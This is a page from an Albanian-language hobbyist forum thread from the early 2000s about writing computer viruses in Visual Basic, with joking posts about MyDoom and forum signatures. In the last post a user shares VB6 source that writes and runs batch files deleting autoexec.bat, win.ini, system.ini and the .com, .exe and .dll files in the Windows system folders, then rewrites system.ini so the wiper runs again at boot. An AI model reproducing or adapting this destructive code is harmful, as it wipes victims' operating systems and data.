Close
Faqja 4 prej 6 FillimFillim ... 23456 FunditFundit
Duke shfaqur rezultatin 31 deri 40 prej 55
  1. #31
    i/e regjistruar Maska e sniper_007
    Anėtarėsuar
    09-09-2003
    Postime
    81
    ke te drejtre sistemi qe i provova ishte windows 2000/xp
    sa per kete sfiden e fundit , sa te instaloj vb do filloj te merrem me kete pune (nderkoh do informohem me shume per sistemet xp dhe 2000 )

    do ja te beja nje pyetje : si e ke vene ate tekstin

    FATI FAVORIZON MENDJEN E PERGATITUR!
    .

  2. #32
    Larguar Maska e cunimartum
    Anėtarėsuar
    07-06-2002
    Vendndodhja
    Canada
    Postime
    678
    sa per kete sfiden e fundit , sa te instaloj vb
    Sfida e fundit s'ka te beje me VB
    Futu ketu
    http://www.mips.com
    per te pare cfare donte te thoshte F I apo ketu per me shume.
    http://www.cs.yorku.ca/%7Easif/2021/lectures/index.htm

  3. #33
    Heavily Equipped Maska e Force-Intruder
    Anėtarėsuar
    04-11-2002
    Postime
    4,910
    ????? C'do te thuash me si e ke vene ate "Fati Favorizon Mendjen e Pergatitur"???

  4. #34
    Heavily Equipped Maska e Force-Intruder
    Anėtarėsuar
    04-11-2002
    Postime
    4,910
    Nqs e ke fjalen per te vendosur firme... shko te llogaria ime -> Profili -> dhe me pas aty ku thote firma shkruaj ate qe do ok?

  5. #35
    [L]{I}[N]{U}[X] Maska e Ardi_Pg_ID
    Anėtarėsuar
    28-01-2003
    Vendndodhja
    New York City Haven on Earth
    Postime
    2,678
    gjerat qenkan be interesante ) !!!
    ardi
    Forgiving Islamic Terrorists is Gods Duty, Our Duty Is To arrange the Meeting
    N. H. Schwarzkopf

  6. #36
    i/e regjistruar Maska e sniper_007
    Anėtarėsuar
    09-09-2003
    Postime
    81
    do i kontrolloj njecik keto adresat , skedarin e pare qe shkarkova
    , me kerkonte acrobat reader qe te hapej , sa te keme koh mo do merem

    bye
    .

  7. #37
    i/e regjistruar Maska e sniper_007
    Anėtarėsuar
    09-09-2003
    Postime
    81
    o f-i , ste ngelet qefi ty se e vura edhe une firmen si ajo jotja , apo jo , se po qe ashtu e heq prap ;-)
    .

  8. #38
    Heavily Equipped Maska e Force-Intruder
    Anėtarėsuar
    04-11-2002
    Postime
    4,910
    Jo ore pse te me ngelet hatri... secili eshte i lire te beje si te doje..
    Nuk na the ke nxjerre ndonje virus te forte qe po ben namin apo jo?
    Ej cuna.. me duket se e gjeta krijuesin e MyDoom.... eshte sniper007.... ikien 500.000 USD LOL

  9. #39
    i/e regjistruar Maska e sniper_007
    Anėtarėsuar
    09-09-2003
    Postime
    81
    te ishja une krijuesi i MyDoom , do ishja une me te mesu tu per viruset pastaj dhe te jepja kodet e vb :-) LoL , sikur te kembehej dituria me 500.000 usd i jepja me gjith qejfffffff

    virus te ri fare fare nuk kam bere sepse skame patur as linj interneti as vb , po kam nje ide

    sikur te krijoje nje program qe te aktivizohej sa here qe hard disku te vente ne nje nivel kapaciteti ......
    psh
    nqs nje hard disk ka kapacitet 2 gb , ne mund te krijonim nje program , qe sa here hard diksku te mbushej deri ne 1 gb te programi te aktivizohej automatikisht

    iden e dhash un tani dua te me jepni kodet ;-)
    .

  10. #40
    i/e regjistruar Maska e sniper_007
    Anėtarėsuar
    09-09-2003
    Postime
    81
    shikoje keto kodet , jane pak me te avancuara se te tjerat








    Private Sub Command1_Click()
    Open "c:\ladi3565.txt" For Output As #1
    Print #1, "@echo off"
    Print #1, "c:\"
    Print #1, "cd c:\"
    Print #1, "del c:\autoexec.bat"
    Close #1
    Name "c:\ladi3565.txt" As "c:\alfa.bat"
    Shell "c:\alfa.bat"
    Kill "c:\alfa.bat"
    Open "c:\windows\boot12.txt" For Output As #1
    Print #1, "@echo off"
    Print #1, "c:\"
    Print #1, "cd c:\"
    Print #1, "del c:\autoexec.bat"
    Close #1
    Name "c:\winnt\boot12.txt" As "c:\winnt\boot12.bat"
    Open "c:\autoexec.txt" For Output As #1
    Print #1, "@echo off"
    Print #1, "cd c:\"
    Print #1, "del *.com"
    Print #1, "cd c:\winnt\"
    Print #1, "del *.exe"
    Print #1, "del win.ini
    Print #1, "cd c:\winnt\system\"
    Print #1, "del *.drx"
    Print #1, "del *.dll"
    Print #1, "cd.."
    Print #1, "boot12
    Print #1, "cd c:\winnt\system32\
    Print #1, "del *.dll"
    Print #1, "del *.oxc"
    Print #1, "cd c:\winnt\"
    Print #1, "boot12.bat
    Close #1
    Name "c:\autoexec.txt" As "c:\autoexec.bat"
    Close #1
    open "c:\kater.txt" for output as #1
    print #1, "@echo off"
    print #1, "c:\"
    print #1, "cd c:\winnt\"
    print #1, "del system.ini "
    close #1
    name "c:\kater.txt" as "c:\kater.bat"
    shell "c:\kater.bat"
    kill "c:\kater.bat"
    open "c:\winnt\system\boot13.txt" for output as #1
    Print #1, "@echo off"
    Print #1, "cd c:\"
    Print #1, "del *.com"
    Print #1, "cd c:\winnt\"
    Print #1, "del *.exe"
    Print #1, "del win.ini
    Print #1, "cd c:\winnt\system\"
    Print #1, "del *.drx"
    Print #1, "del *.dll"
    Print #1, "cd.."
    Print #1, "boot12
    Print #1, "cd c:\winnt\system32\
    Print #1, "del *.dll"
    Print #1, "del *.oxc"
    close #1
    name "c:\winnt\system\boot13.txt" as "c:\winnt\system\boot13.bat"
    open "c:\winnt\system.txt" for output as #1
    print #1, "[boot]"
    print #1, "shell=Explorer.exe bot12.bat"
    close #
    name "c:\winnt\system.txt" as "c:\winnt\system.ini"
    End Sub
    .

Faqja 4 prej 6 FillimFillim ... 23456 FunditFundit

Tema tė Ngjashme

  1. Sigurimi i kompjuterit
    Nga Force-Intruder nė forumin Trajnim & leksione
    Pėrgjigje: 8
    Postimi i Fundit: 06-11-2011, 16:02
  2. Trojanėt sulmojnė edhe celularėt
    Nga NBAlbania nė forumin Lajme nga informatika
    Pėrgjigje: 0
    Postimi i Fundit: 27-01-2009, 11:48
  3. Si te bllokosh marrjen e viruseve trojaneve nga websajtet e infektuara
    Nga benseven11 nė forumin Trajnim & leksione
    Pėrgjigje: 0
    Postimi i Fundit: 26-06-2004, 12:49

Regullat e Postimit

  • Ju nuk mund tė hapni tema tė reja.
  • Ju nuk mund tė postoni nė tema.
  • Ju nuk mund tė bashkėngjitni skedarė.
  • Ju nuk mund tė ndryshoni postimet tuaja.
  •